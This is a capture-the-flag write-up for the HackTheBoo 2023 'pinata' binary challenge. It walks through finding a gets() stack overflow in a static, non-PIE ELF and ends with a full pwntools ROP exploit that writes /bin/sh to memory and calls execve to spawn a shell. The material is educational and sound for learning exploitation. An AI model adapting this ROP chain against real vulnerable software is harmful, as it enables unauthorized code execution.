# Pinata

## Preliminary analysis

```console
opcode@parrot$ file pinata      
pinata: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=2dcf43face3a1fa76053b1589acf3b6e12d2eba4, for GNU/Linux 3.2.0, not stripped
```

It is a 64-bit binary: statically linked and not stripped.

```console
opcode@parrot$ ldd ./pinata       
	not a dynamic executable
```

I don't know why the `libc.so.6` was provided with challenge binary.

```console
opcode@parrot$ checksec pinata      
[*] '/mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
```

All protection mechanisms but the canary seem to be disabled.  
But we cannot wholly trust `checksec` for detecting canary on statically linked binaries.  
It is easier to ascertain that from source.

## Finding the vulnerabilty with pseudocode

The `main()` function is straightforward:

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setup(argc, argv, envp);
  banner();
  reader();
  write(1LL, "\nNot loud enough..\n", 19LL);
  return 0;
}
```

`setup()` disables buffering with `setvbuf()` and sets an `alarm()`.  
`banner()` simply prints the banner.  
The `reader()` function is also very straightforward:

```c
__int64 reader()
{
  char v1[16]; // [rsp+0h] [rbp-10h] BYREF

  return gets(v1);
}
```

It is vulnerable to a buffer overflow due to `gets()`  
Also, note that no canary is present.

## Finding the offset to instruction pointer and canary

Now, we need to find the offset to instruction pointer.

```console
opcode@parrot$ gdb ./pinata
[--SNIP--]
gef➤  disass reader
Dump of assembler code for function reader:
   0x000000000040186b <+0>:	endbr64
   0x000000000040186f <+4>:	push   rbp
   0x0000000000401870 <+5>:	mov    rbp,rsp
   0x0000000000401873 <+8>:	sub    rsp,0x10
   0x0000000000401877 <+12>:	lea    rax,[rbp-0x10]
   0x000000000040187b <+16>:	mov    rdi,rax
   0x000000000040187e <+19>:	mov    eax,0x0
   0x0000000000401883 <+24>:	call   0x40c270 <gets>
   0x0000000000401888 <+29>:	leave
   0x0000000000401889 <+30>:	ret
```

I set a breakpoint right after `gets`, ran the program, and used `10973731` for input.

```console
gef➤  b* 0x0000000000401888
Breakpoint 1 at 0x401888
gef➤  r
Starting program: /mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata 
██████████████████████████████████
        █
        █
        █
        █
        █       ████
        █      ██████
        █      ██ ██
 ████████████████
███████████████▬ 
  █████████████
  ██ ██  ██ ██
  ██ ██  ██ ██

Scream as much as you can to break the pinata!!

>> 10973731
```

Then I searched for my input string and the instruction pointer on stack:

```console
gef➤  search-pattern 10973731
[+] Searching '10973731' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rwx
  0x7fffffffddc0 - 0x7fffffffddc8  →   "10973731" 
gef➤  i f
Stack level 0, frame at 0x7fffffffdde0:
 rip = 0x401888 in reader; saved rip = 0x4018ab
 called by frame at 0x7fffffffddf0
 Arglist at 0x7fffffffddd0, args: 
 Locals at 0x7fffffffddd0, Previous frame's sp is 0x7fffffffdde0
 Saved registers:
  rbp at 0x7fffffffddd0, rip at 0x7fffffffddd8
```

`0x7fffffffddd8 - 0x7fffffffddc0` is 24. Therefore, the offset is 24.

## Making an `execve` syscall with ROP gadgets

Since it is a statically linked binary with no PIE, no leaks are necessary.  
Furthermore, statically linked binaries have an abundance of ROP gadgets to use.  
There usually are enough gadgets to perform most syscalls.  
We can use the linux syscall table at <https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md> to get the list of registers needed to perform any syscall.

One approach to solve this challenge is to use a `write-what-where` gadget to write `/bin/sh` to a known memory location and then make an `execve` syscall.  
For `execve`, we need control over `rax`, `rdi`, `rsi` and `rdx` registers.  
The binary contains suitable gadgets to control them all:

```console
opcode@parrot$ ROPgadget --binary pinata | grep -E ': pop r[a-z]{2} ; ret$'
0x0000000000448017 : pop rax ; ret
0x0000000000401771 : pop rbp ; ret
0x00000000004019a0 : pop rbx ; ret
0x0000000000401f6f : pop rdi ; ret
0x0000000000409f9e : pop rsi ; ret
0x00000000004023ce : pop rsp ; ret
opcode@parrot$ ROPgadget --binary pinata | grep -E ': pop rdx ; pop .+ ret$'
0x000000000047f20b : pop rdx ; pop rbx ; ret
```

We also have an abundance of `write-what-where` gadgets:

```console
opcode@parrot$ ROPgadget --binary pinata | grep -E ': mov qword ptr \[r[a-z]{2}\], r[a-z]{2} ; ret'
0x00000000004931ca : mov qword ptr [rcx], rdx ; ret
0x000000000042d0bb : mov qword ptr [rdi], rcx ; ret
0x000000000042d3c3 : mov qword ptr [rdi], rdx ; ret
0x00000000004139c8 : mov qword ptr [rdx], rax ; ret
0x000000000044a495 : mov qword ptr [rsi], rax ; ret
0x000000000048d4ea : mov qword ptr [rsi], rdx ; ret
```

We also need a location to write `/bin/sh` to, ideally not used by the program.

```console
opcode@parrot$ gdb ./pinata
[--SNIP--]
gef➤  r
Starting program: /mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata 
██████████████████████████████████
        █
        █
        █
        █
        █       ████
        █      ██████
        █      ██ ██
 ████████████████
███████████████▬ 
  █████████████
  ██ ██  ██ ██
  ██ ██  ██ ██

Scream as much as you can to break the pinata!!

>> ^C
[--SNIP--]
gef➤  vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x0000000000401000 0x0000000000000000 r-- /mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata
0x0000000000401000 0x0000000000498000 0x0000000000001000 r-x /mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata
0x0000000000498000 0x00000000004c1000 0x0000000000098000 r-- /mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata
0x00000000004c2000 0x00000000004c6000 0x00000000000c1000 r-- /mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata
0x00000000004c6000 0x00000000004c9000 0x00000000000c5000 rw- /mnt/hgfs/Opcode/HTB/HackTheBoo2023/pwn_pinata/pinata
0x00000000004c9000 0x00000000004ce000 0x0000000000000000 rw- [heap]
0x00000000004ce000 0x00000000004f0000 0x0000000000000000 rw- [heap]
0x00007ffff7ff9000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]
0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rwx [stack]
```

`0x4c9000` fits the bill. It is the only segment in the binary with `rw-` permissions.  
The `rw-` permission allows us to read and write to it. Being a segment of the binary, it would have a fixed address (no PIE)

Furthermore, the address only has null bytes. It is likely not being utilized by the program.

```console
gef➤  x/10g 0x4c9000
0x4c9000 <initial+896>:	0x0	0x0
0x4c9010 <initial+912>:	0x0	0x0
0x4c9020 <initial+928>:	0x0	0x0
0x4c9030 <initial+944>:	0x0	0x0
0x4c9040 <initial+960>:	0x0	0x0
```

Finally, <https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md> can be used to find out appropriate syscall number and values to fill the registers with.  
We can combine it all to make a functional exploit that spawns a shell:

```py
from pwn import *

exe = context.binary = ELF("./pinata", checksec=False)
# context.log_level = 'debug'

p = process(exe.path)
# p = remote('94.237.56.76', 49164)

offset = 24
write_addr = 0x4c9000 # vmmap shows rw- and x/10g shows only null bytes

rop = ROP(exe)
pop_rax = rop.find_gadget(["pop rax", "ret"])[0]
pop_rdi = rop.find_gadget(["pop rdi", "ret"])[0]
pop_rsi = rop.find_gadget(["pop rsi", "ret"])[0]
pop_rdx_rbx = rop.find_gadget(["pop rdx", "pop rbx", "ret"])[0]
syscall = rop.find_gadget(["syscall"])[0]

www_gadget = next(exe.search(asm('mov qword ptr [rsi], rax; ret')))

payload = flat({
    offset: [
        # write-what-where gadget to
        # write /bin/sh in memory
        p64(pop_rax),
        b'/bin/sh\x00',
        p64(pop_rsi),
        p64(write_addr),
        p64(www_gadget),
        # execve syscall for shell
        p64(pop_rax),
        p64(0x3b),
        p64(pop_rdi),
        p64(write_addr),
        p64(pop_rsi),
        p64(0),
        p64(pop_rdx_rbx),
        p64(0),
        p64(0),
        p64(syscall)
    ],
})

# gdb.attach(p, gdbscript=f'watch *{write_addr}')
# pause()
p.sendlineafter(b'pinata!!\n\n>> ', payload)
p.interactive()
```
